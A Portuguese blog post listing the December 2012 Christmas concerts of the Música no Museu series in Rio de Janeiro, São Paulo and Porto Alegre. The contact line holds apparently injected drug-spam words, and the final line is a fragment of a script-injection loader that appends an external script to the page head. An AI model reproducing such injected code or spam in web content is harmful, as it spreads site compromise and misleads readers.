Escrito por em 7 dez 2012 nas áreas Lateral, Movimento, Música de câmara, Programação

Grandes concertos de Natal.

Música no Museu encerra a temporada 2012, neste mês de  dezembro,  com 28 concertos sendo  24 no Rio de Janeiro, três em São Paulo e um em Porto Alegre e, assim, chegando a mais de 450 no ano.

Nesta programação anual, inseriram-se, com  êxitos, o  VII  RioHarpFestival realizado em maio, Música no Museu Internacional nas cidades de Portugal, Espanha, França e Austrália,  o V Festival Internacional de Sopros em novembro e as finais do V  Concurso Jovens Músicos e o  VI Encontro de Empreendedorismo na Área Musical, assim, consolidando-se como a maior Série de música clássica do Brasil, além de incursões internacionais.

Nestes  programas de dezembro, enfatizam-se as músicas natalinas, mesclando várias formações desde coros a orquestras, mas também cordas e pianos.

Destaques para os pianistas italianos Giuseppe Gullota, Antonello d”Onofrio e Claudio Soviero e para o grupo Al Nur Kibir que tem aparecido na novela da tv Globo e que traz as musicas árabes de Natal no Museu do Exército-Forte de Copacabana.

Destaque especial para o  V Seminário de Empreendedorismo na Área Musical dia 12 de dezembro das  9h às 17h no Centro Cultural Justiça do Trabalho.

Para finalizar a programação desse ano, o Madrigal Cruz Lopes   apresenta-se no dia 20, às 18:30h, na Igreja N. S. da Paz, encerrando-se, de forma abençoada, a programação de 2012 e as comemorações dos 15 anos de Música no Museu.

Esperamos por vocês. Maiores informações poderão ser obtidas no site www.musicanomuseu.com.br. Sds Sergio da Costa e Silva- amiloride furosemide tel: 2253-8645.

 

Dia 01 – Sábado – 11:30h.

Parque das Ruínas
Rua Mutinho Nobre, 169 – Santa Teresa

Músico: Grupo Sandro Shankara

Programa: Músicas indianas de Natal.

Dia 02 – Domingo – 11:30h.

Museu de Arte Moderna – MAM
Rua Infante Don Henrique s/no. Centro

Músico: Neti Szpilman, soprano, e Dília Tosta, piano

Programa: Villa Lobos, Mignone, Lorenzo Fernandes, Santoro

Dia 03 – Segunda-feira – 12:30h.

Biblioteca Nacional
Rua México, s/n – Centro

Músico:  Coral Iesa in Canto. Direção: Gláucia Henriques

Programa: Clássicos de Natal

Dia 04 – terça-feira – 12:30h.

Clube de Engenharia
Av. Rio Branco, 124 – 22º andar – Centro

Músico: Gardenia Garcia, piano.

Programa: Clássicos de Natal

Dia 05 – Quarta-feira – 12:30h.

Teatro SESI
Av. Graça Aranha, 1 – Centro

Músico: Grupo Tutti

Programa: Natal in jazz

Dia 06 – Quinta-feira – 12:30h.

Museu Nacional de Belas Artes
Av. Rio Branco, 199 – Centro

Músico:  Trio D´Ambrosio – Aizik Geller, violino, Maria Helena Andrade piano e Maria Celia Machado, harpa.

Programa:  TCHAIKOVSKY, RIMSKY- KORSAKOV, SAINT- SAËNS, MANUEL DE FALLA, CHIQUINHA GONZAGA, ERNESTO NAZARETH

Dia 07 – Sexta-feira –12:30h.

Centro Cultural Light
Rua Marechal Floriano, 168 – Centro

Músico: Duo Cedmon Alves, violão e Reinaldo Pestana, percussão.

Programa: Francisco Tárrega, João Pernambuco, Cedmon Alves

Dia 08 – Sábado – 11:30h.

Parque das Ruínas
Rua Murtinho Nobre, 169 – Santa Teresa

Músico: ABSTRASSOM

Programa: Clássicos de Natal

Dia 09 – Domingo – 11:30h.

Museu de Arte Moderna – MAM
Av. Infante Dom Henrique,s/n – Centro

Músico: Luiz Bonfim, voz e Regina Lacerda, piano

Programa: Händel, Gounod, Bach, Mozart, Franck.

Dia 10 – Segunda-feira – 12:30h.

Clube de Engenharia
Av. Rio Branco, 124 – Centro – 22º andar

Músico: Marcio Junior, trompete e Maria Luisa Lundberg, piano

Programa: Artur Honegger, George Enesco, H. Alves de Mesquista, Torvald Hansen, Oswaldo Lacerda

Dia 11- Terça-feira- 11:30h.

Missa em Ação de Graças: 15 anos de Música no Museu
Igreja Santa Cruz dos Militares
Rua 1º de Março, 36 – Centro

Dia 11- Terça-feira- 12:30h.

Igreja Santa Cruz dos Militares
Rua 1º de Março, 36 – Centro

Músico: Claudio Ribeiro, órgão.

Programa: Jan Pieterszoon Sweelinck, Anthoni van Noordt, Johann Adam Reincken e Johann Sebastian Bach (homenagem aos 450 anos do nascimento de Sweelinck).

Dia 11 – Terça-feira – 20h.

Iate Clube do Rio de Janeiro
Av. Pasteur, 333 – Urca

Músico: Grupo Signorine- Anne Meyer – Soprano-Fernanda Alvarez – Violino-Clara Borges de Medeiros – violoncelo -Érika Machado  – Piano

Programa: Francesco Provenzale, Domenico Gabrielli, Alessando Scarlatti, Bernardo Gaffi, Giovanni Battista, Bononcini, Sigismund Neukomm, Vivaldi, Padre José Maurício Nunes Garcia, José Rodrigues Domingos de Meirelles

Dia 12 – Quarta-feira – 12:30h.

Museu da Republica
Rua do Catete, 153 – Catete

Músico: Gardênia Garcia, piano.

Programa: Clássicos do Natal

Dia 13 – Quinta-feira – 18h.

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Coral Agora Vaz – Regência: Célia Vaz

Programa: Clássicos brasileiros

Dia 14 – Sexta-feira – 15h.

Centro Cultural Justiça Federal
Av. Rio Branco, 241 – Centro

Músico: Orquestra de Cavaquinhos de Cabo Frio. Regente: Maestro Budega. Lançamento do cavaquinho acústico.

Programa
Primeira parte – Participação da Orquestra de Cavaquinhos de Cabo Frio
Repertório: Luiz Gonzaga mais 03 canções natalinas;

Segunda parte – Lançamento do cavaquinho sinfônico, Autor: Angelo-Angeluz
Repertório: Waldir Azevedo, Ary Barroso


Dia 15 – Sábado – 18h.

Palácio São Clemente- Consulado de Portugal
Rua São Clemente, 424 – Botafogo

Músico: DUO D’ONOFRIO-SOVIERO: Antonello d”Onofrio e Claudio Soviero, pianos.

Programa: Ravel, Schubert, Poulenc, Mozart

Dia 15 – Sábado – 20h.

Centro Loyola de Fé e Cultura – PUC/Rio
Estrada da Gávea, nº 1

Músico: Coral Abstrassom

Programa: Clássicos de Natal

Dia 16 – Domingo – 11:30h.

Museu de Arte Moderna – MAM
Rua Infante Dom Henrique, s/n – Centro

Músico:  Antonelo D’Onofrio, piano

Programa: Mozart, Liszt, Scriabin, Prokofiev, Debussy

Dia 17 – Segunda-feira – 18h.

Casa de Cultura Laura Alvim
Av. Vieira Souto, 176 – Ipanema

Músico Orquestra de Pandeiros

Programa: Clássicos ao som dos pandeiros

Dia 18 – Terça-feira- 12:30h.

CCBB
Rua 1º de março, 66 – Centro

Músico:  Giuseppe Gullota, piano

Programa: Mozart, G. Lupis, Tchaikovsky/Pletnev, Chopin, Debussy

Dia 18 – Terça-feira – 18h.

Museu do Exército / Forte de Copacabana
Praça Cel. Eugenio Franco, 1 – Posto 6

Músico: Al Nur Kibir

Programa: Músicas árabes de Natal.

Dia 19- Quarta-feira- 12:30h.

Museu da República
Rua do Catete, 153 – Catete

Músico: Maria Luisa, piano e Tais Soares, violino.

Programa: Beethoven, Veniavsky, Schumann e Manuel de Falla

Dia 20 – Quinta-feira – 18:30h.

Igreja N. Sra. da Paz
Rua Visconde de Pirajá, 339 – Ipanema

Músico: Madrigal Cruz Lopes. Regência: José Machado Neto
Participação Especial da CAMERATA A4 CORDA E DA PIANISTA REGINA TATAGIBA

Programa: Schubert. Bonaventura Soma, Adolph Adam, Michael W. Smith, Mozart, Beethoven, G. F. Handel, F. Gruber

 

OUTRAS CIDADES

São Paulo

Museu da Casa Brasileira – 11h.
– Dia 02 – OCAM- Orquestra de Câmara da ECA/USP – regente: Gil Jardim
– Dia 09 – Orquestra Pinheiros e Coral EPC – É Tempo de Natal –  regente: Murilo Alvarenga
– Dia 16   – Orquestra  Sinfônica Infanto Juvenil – Projeto Guri – regente: Lutero Rodrigues.

Porto Alegre

Museu de História da Medicina do RS – MUHM
Av. Independência, 270 – Centro, Porto Alegre, RS

– Dia 06 de dezembro de 2012- 18:30h.
Músicos: Clistenes Hafner Barítono, Raíssa Panatieri Mezzo-soprano,Fernando Rauber Piano.
Programa: Árias e canções de óperas

– Dia 08 de dezembro de 2012- 20h.
Natal na Praça 2012.

Praça Dom Sebastião

Museu de História da Medicina do RS – MUHM, Santa Casa de Misericórdia de Porto Alegre, Colégio Marista Rosário, Igreja Nossa Senhora da Conceição e AMABI

Músicos: Camerata Mansão Musical, Grupo de Flautas do Colégio Rosário, Coral da ACIRS – Associação Italiana, Coral da Santa Casa de Misericórdia de Porto Alegre

Programa: Músicas natalinas

d.getElementsByTagName(‘head’)[0].appendChild(s);